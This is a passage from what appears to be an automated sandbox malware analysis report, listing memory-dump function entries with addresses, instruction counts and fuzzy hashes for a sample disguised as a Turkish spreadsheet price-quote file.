                                                  • Instruction Fuzzy Hash: 2E01F731A46208AFC712DFA0D448D6E7BB9EF46310F5081E9C90957251EF769E11DBE2
                                                  Function 05AED8BC Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfcc540220134660154ad0027e36e7947d1cb53b81555507f9c0e7faac49c655
                                                  • Instruction ID: 3f70bb702b3aa4db6ef71921f62f845fa376d2c17094f30440695f8694f07a7d
                                                  • Opcode Fuzzy Hash: bfcc540220134660154ad0027e36e7947d1cb53b81555507f9c0e7faac49c655
                                                  • Instruction Fuzzy Hash: 171163B5E012288FEB68CF58CD95BEDBBB1BB89301F4441E9994DA7341DA705E84CF41
                                                  Function 05AD87AF Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 16578f4609b01f2146022f42284a0e93994e5da1be2a2b22ba7498e6a355fd86
                                                  • Instruction ID: 1658d35beb4efbec480720b6e1f7aecf87111a81a2f10189acee1bb61816b6ed
                                                  • Opcode Fuzzy Hash: 16578f4609b01f2146022f42284a0e93994e5da1be2a2b22ba7498e6a355fd86
                                                  • Instruction Fuzzy Hash: AF01F97091920AAFC742FBA4D440EAEFFF5EF06351F1081E5D80597152EB766D11CBA1
                                                  Function 031119C2 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fddd1fdf3f3964d1a2898a1558615aeaaaa001c3ead1bd06c1ec8fd6cf8363d
                                                  • Instruction ID: d93c09192f52c847d05f953ef6dc3a8023dd6c66e384d735e802bea16199bbc1
                                                  • Opcode Fuzzy Hash: 5fddd1fdf3f3964d1a2898a1558615aeaaaa001c3ead1bd06c1ec8fd6cf8363d
                                                  • Instruction Fuzzy Hash: AD11A130901159DFDB04CB69F4897F9BBB7FB89301F0890B1D6064A159D7395996CB01
                                                  Function 031180A5 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b12c1f9513b89c2a55f471cccce73ba92d38c30939b4424683231545413cea2e
                                                  • Instruction ID: 7ea9e5b7ade136909fef5ef29a62c356b19b60839b217bfc6631751df42f6a69
                                                  • Opcode Fuzzy Hash: b12c1f9513b89c2a55f471cccce73ba92d38c30939b4424683231545413cea2e
                                                  • Instruction Fuzzy Hash: B7110670D0520DDFDB48EF9AE08479DBBF1FF59305F61C1AAD009A7254D73449848B11
                                                  Function 05AE4438 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0569896980d6d82a3d18f423fbb990b564e9c8b133c82437f23f630a69597c9
                                                  • Instruction ID: 210d04c41522035fa5d61fe9400c572c01cdb76a7eda7f085682ff956cfa7065
                                                  • Opcode Fuzzy Hash: f0569896980d6d82a3d18f423fbb990b564e9c8b133c82437f23f630a69597c9
                                                  • Instruction Fuzzy Hash: E101C4343043449FCB269B34D458E3A3BA6AFC9310F18896CD6964B791DB75E841D791
                                                  Function 05ADAE98 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb184969b2d6a39dc58a2469d875ad55d73f7887ebd065288baddcad9c206b54
                                                  • Instruction ID: ace2db3dfde002f8c8f31b328e59922566d531d951544f9c3f4d0e24bc1578d7
                                                  • Opcode Fuzzy Hash: bb184969b2d6a39dc58a2469d875ad55d73f7887ebd065288baddcad9c206b54
                                                  • Instruction Fuzzy Hash: 2A01D4763042544FC7059F19E880E96FBB9FF9A61472580AEF416CB361DA70EC05C760
                                                  Function 05AE5C48 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 239849fe3686c7a5fb5a5e4fe655eb94657c0b9e2f389c6c0ea0f4c9c7f32d22
                                                  • Instruction ID: 4037aac975475c91624a9abaf3b2cc0d3802f3cb9a7613eb5749328f9c4dbdf0
                                                  • Opcode Fuzzy Hash: 239849fe3686c7a5fb5a5e4fe655eb94657c0b9e2f389c6c0ea0f4c9c7f32d22
                                                  • Instruction Fuzzy Hash: 6E014971B063249BCB15AB54E869FAEBBB6EBCC325F00843AD511A7380CB719D0387D1
                                                  Function 057ECC58 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e60203736865e9fbada62f9c4096e8bddf33bdfa0d421a014a2a6fc05ab5a5c7
                                                  • Instruction ID: e0bb50664fbd79e2fe302aaa456d424694e2dbccb10c594d83333677e13e842d
                                                  • Opcode Fuzzy Hash: e60203736865e9fbada62f9c4096e8bddf33bdfa0d421a014a2a6fc05ab5a5c7
                                                  • Instruction Fuzzy Hash: 26016971D18209DFCB51DFB8D9446AEBBF4FB49205F1045AAD80AE7261E7354A01DB42
                                                  Function 057ED107 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0ba509e2dd543b8baa09f2236c7e092c5102ddc4758d70cd2c5923a8efa8b52
                                                  • Instruction ID: 322218b0c8a5eb62021750ade92d94cb914f2953d33ebd1e82bf381ba97fc3b8
                                                  • Opcode Fuzzy Hash: a0ba509e2dd543b8baa09f2236c7e092c5102ddc4758d70cd2c5923a8efa8b52
                                                  • Instruction Fuzzy Hash: 6E111BB0D193498FCB65CFB998456AEBFF2FF8A300F1981AAC408E7256D7344941CB91
                                                  Function 05AD71BD Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27c1a29d5ebdf97b98075bd045529fbaaf582b9d99860aa48ddc49c22216cd88
                                                  • Instruction ID: c74c2b83c1d565589607dec7c9576aa105dd8fd9db88c30700e911b9c5580c19
                                                  • Opcode Fuzzy Hash: 27c1a29d5ebdf97b98075bd045529fbaaf582b9d99860aa48ddc49c22216cd88
                                                  • Instruction Fuzzy Hash: 35110A74901109CFDB18EF69E484B9DBBB2FB56704F5081AAE00AA3294DB345E86CF61
                                                  Function 05ADA338 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d158d5e916d5ac160d79736ba6f636c49ac9577f13c74b41248bb4401164beab
                                                  • Instruction ID: 79b296e9a8c093f181e1047d7a98ae3d37061e273b02281c8e2e37e9cc05bab1
                                                  • Opcode Fuzzy Hash: d158d5e916d5ac160d79736ba6f636c49ac9577f13c74b41248bb4401164beab
                                                  • Instruction Fuzzy Hash: 79F0F935B096005FD70557589800F5AFBA9EF85310F0544A6D80ADF352CA759C41C3B0
                                                  Function 03116410 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4d34c32c0db6e5f160523a797e9542626c60423bb270c4a222a7a0d88744b50
                                                  • Instruction ID: 471461309cfde6cd1e6cdf87aa94c0084731fd8040b35cf6518dd2ec09dc4cda
                                                  • Opcode Fuzzy Hash: b4d34c32c0db6e5f160523a797e9542626c60423bb270c4a222a7a0d88744b50
                                                  • Instruction Fuzzy Hash: 3B01FF75B802108FCB44AB7CD518D593BEAAF8C66131245A5E50ACB374DE78DC4187A0
                                                  Function 05AE4448 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f74fa1fd973332441e487071faa78b9d74b61af6a5ad417bb29d6bf4b6cad08
                                                  • Instruction ID: fb608789ba8ce0b2e57fa0ab8fe08cbeb92e4b621e590dcf5ba09ef3086ae82e
                                                  • Opcode Fuzzy Hash: 6f74fa1fd973332441e487071faa78b9d74b61af6a5ad417bb29d6bf4b6cad08
                                                  • Instruction Fuzzy Hash: A00171343002049FC7259B24D544E3A77ABFFC9364F24866CE6564B790DBB5EC82DB90
                                                  Function 05ADC600 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c3c1d454ad2ef085c1223154bd1e7ed06d680d9e8cbbcf7ea89d237b28a0c87
                                                  • Instruction ID: fcc3bf0427f812a9345986b9ec2f9661e83e20e61a6e2712a97c78bade26b972
                                                  • Opcode Fuzzy Hash: 1c3c1d454ad2ef085c1223154bd1e7ed06d680d9e8cbbcf7ea89d237b28a0c87
                                                  • Instruction Fuzzy Hash: 3F012671618204AFCF069F64D828AACFFB7EF45224F45A0A5E00BC6181EB351A42C774
                                                  Function 03116599 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 739d60b7e1986595c4b83120d3262d92d89f0465fb61c9924408ed0f43663f1d
                                                  • Instruction ID: 1db587c8f7b215492762e6ce4e033e8b58bf2b06eb9b6405e3053bcc894875ee
                                                  • Opcode Fuzzy Hash: 739d60b7e1986595c4b83120d3262d92d89f0465fb61c9924408ed0f43663f1d
                                                  • Instruction Fuzzy Hash: B3011D35B406104FCB55EB78D41899D3BE6AFAD66031645AAE40ACB375DE39DC01C750
                                                  Function 057E4179 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3679ec9e49914dc208173795da76e5b59d904981ee426e1a8b287f609eb2eb0e
                                                  • Instruction ID: ae2da4b2a68170b0fe215954f0757570e5e6028f656b83bc6cfaec6adff4ae34
                                                  • Opcode Fuzzy Hash: 3679ec9e49914dc208173795da76e5b59d904981ee426e1a8b287f609eb2eb0e
                                                  • Instruction Fuzzy Hash: B601F774569204AFCF01DFA4D840A5D7BB6EF1A311F0085E5C8048B151CB729A10DB92
                                                  Function 057EF948 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a64aba2f717ff655f822f4b82167e515d1937859de80c8b9ce43c190eb6a84c8
                                                  • Instruction ID: f28ef3c8be29113426779b428a3bb2586ee6cbeb52a95df912bdb1baeb20b928
                                                  • Opcode Fuzzy Hash: a64aba2f717ff655f822f4b82167e515d1937859de80c8b9ce43c190eb6a84c8
                                                  • Instruction Fuzzy Hash: 15F04C367001047BC7149A18D444ABAB76AEF88220B058026E914DB331EA308C168790
                                                  Function 057E2208 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cc5470c0ca1514a4c65a7ff9796676967f7a73e33f34a376c58baca3ac451ec
                                                  • Instruction ID: 785722c7488d2976d21f93054e065f5256537ddb4ad129a033e40f9c3f77b121
                                                  • Opcode Fuzzy Hash: 6cc5470c0ca1514a4c65a7ff9796676967f7a73e33f34a376c58baca3ac451ec
                                                  • Instruction Fuzzy Hash: 1401D135549248DFCB12DB64C890E59BBBDEF0B300B4541E5C8059B112DA72A901E7A2
                                                  Function 05AED3E0 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 895b55081e20977e7c396d71dca60d5375281eb15a9ec731d445fd56286f752d
                                                  • Instruction ID: 775648bdefdb3b3683ddcc648d046940f5a18a533042b072882b7f20680a8e28
                                                  • Opcode Fuzzy Hash: 895b55081e20977e7c396d71dca60d5375281eb15a9ec731d445fd56286f752d
                                                  • Instruction Fuzzy Hash: 2FF0AF71A0E349DFCB42DBB4D0109EDBBB9EB06211F1144EDE8099B192DB326E45D792
                                                  Function 05AD7D33 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6934bbeb8891989bb1e8c6865bb6542c5b52ec8b27eceede2d7072e7044eb7b0
                                                  • Instruction ID: 66edf16983343314e6c7ea98604244691a4d635b13f3560d76a5183a8cb791d7
                                                  • Opcode Fuzzy Hash: 6934bbeb8891989bb1e8c6865bb6542c5b52ec8b27eceede2d7072e7044eb7b0
                                                  • Instruction Fuzzy Hash: 0A01F431A44208AFCB05EFA4D440BBDFBB5EF06225F1444EAD80597251EB72AE10DFE1
                                                  Function 031119D0 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0b46202854b98058c1eef72cda463749346d752cb15ef8d66f29f5346b7e5cb
                                                  • Instruction ID: 61c1fe2f34ae625f7d80073f30cf2b8782fd57776f1cefba231fcd0bcfeb3c69
                                                  • Opcode Fuzzy Hash: e0b46202854b98058c1eef72cda463749346d752cb15ef8d66f29f5346b7e5cb
                                                  • Instruction Fuzzy Hash: 35017C30A02059EFDB04DF59F9497EAB7BBF788301F0490B1D60647258D7795DA6CB41
                                                  Function 05AED468 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92ae62c5070a6fc346df87156c29cfa828261c4d8ace441b3a368b3094a8bb61
                                                  • Instruction ID: 4eebfeedc6aa341976fc26d75755caef92b9435b82357326ac191942368e223d
                                                  • Opcode Fuzzy Hash: 92ae62c5070a6fc346df87156c29cfa828261c4d8ace441b3a368b3094a8bb61
                                                  • Instruction Fuzzy Hash: 36F0A470909388DFCB51DFB8E4409EC7FF0AB06214F1041EDD5449F291D3325681D741
                                                  Function 05AE2350 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33870cbe827607468d628c3ea151a689a909eb986e2ec6d04d88853b5625092f
                                                  • Instruction ID: abd69f4fa3fdac58c6817c7f3ee067076dd0d6448659efd3b263d3ebe3f323ff
                                                  • Opcode Fuzzy Hash: 33870cbe827607468d628c3ea151a689a909eb986e2ec6d04d88853b5625092f
                                                  • Instruction Fuzzy Hash: 95011D353006149FC709DF25E45595A7BA6EBCC711B108168E50A87754CF76ED42CBE1
                                                  Function 05ADA3A0 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c7034eabdf267c4b43863f77e02623feed61077e27fe3b5480089e43d8e9407f
                                                  • Instruction ID: 47de283e2ea6b4278f0810b7b0d1a108d3907d43e6e6f26537b76d5902cb004f
                                                  • Opcode Fuzzy Hash: c7034eabdf267c4b43863f77e02623feed61077e27fe3b5480089e43d8e9407f
                                                  • Instruction Fuzzy Hash: 04F02B76B4D2805FD31257385810B29AFE3EB96204F1800DAD0438F6A5DA668803C361
                                                  Function 05AD7333 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 075a8237d5f97071597ba86b1e8b66645649a63afb49bb35d091811ad7e983ff
                                                  • Instruction ID: 68d128f02783820b623bf8d81fe55bd2c16817a912ee6e72e83326e5de7423b3
                                                  • Opcode Fuzzy Hash: 075a8237d5f97071597ba86b1e8b66645649a63afb49bb35d091811ad7e983ff
                                                  • Instruction Fuzzy Hash: 52012D749012098FDB18EF69E095B9DBBF2FB56704F50016AE00A67255DB345E85CF20
                                                  Function 05E03C40 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca0b77487adb4bc26ef29c423fd471ec55dd5b14cef5d6a1c678208b58b418c8
                                                  • Instruction ID: 450b8bf3cfcdea8271062108ca302ef641d475d79c8b97f7e0d26bc07b9fb7e4
                                                  • Opcode Fuzzy Hash: ca0b77487adb4bc26ef29c423fd471ec55dd5b14cef5d6a1c678208b58b418c8
                                                  • Instruction Fuzzy Hash: 93016D31C0420ADBCF01DF98D8409EDFB75FF49325F10C559E99463252D731A5A6DBA0
                                                  Function 031165A8 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bd5625a5defb3fc1d7f33ed20f0070c46bf5c99020eb1ad4ac7feb94b24c7af
                                                  • Instruction ID: c308b941b4689e383d8978d43eccfb16d7c9d702d18548ad119b378ae8d2e62f
                                                  • Opcode Fuzzy Hash: 0bd5625a5defb3fc1d7f33ed20f0070c46bf5c99020eb1ad4ac7feb94b24c7af
                                                  • Instruction Fuzzy Hash: 44F03A35B802104FCB44EB7CD51895E3AEAAFEC66131245A5E90ACB378EE79DC4187A4
                                                  Function 05AECB29 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3769b376952a3686a09c22dc313cda352a1d24d070bea2333a4bc2f59ac494a0
                                                  • Instruction ID: 80946a6a189806de93925eb5ccc60da456fbb866456b751336402c875a14c749
                                                  • Opcode Fuzzy Hash: 3769b376952a3686a09c22dc313cda352a1d24d070bea2333a4bc2f59ac494a0
                                                  • Instruction Fuzzy Hash: 32F09630909248EFCB41DF98C924DADBFB9EB49251F04C1EAE85497251C6319E15DB51
                                                  Function 05ADA348 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d8c2505ccc27a8373ae80f9658501fc10374b1756e82bcc108d14c437529f1d
                                                  • Instruction ID: 5553332604aaa7e822777322337e9253a2d69f5890fca095981e73513f6919b7
                                                  • Opcode Fuzzy Hash: 2d8c2505ccc27a8373ae80f9658501fc10374b1756e82bcc108d14c437529f1d
                                                  • Instruction Fuzzy Hash: 8CF0E936B452115FE31497199804B6FF7EEFBC9710F144429E90A9B351CB75AC4183E4
                                                  Function 03111A59 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b90963e23448efb8d18cf957bf72b16415a58573cdcc7e727547115d3a419ccb
                                                  • Instruction ID: 5fbc4b32dfaba9c4196a769d6d8157f7e90242a7d856b55ad79a5779022141c6
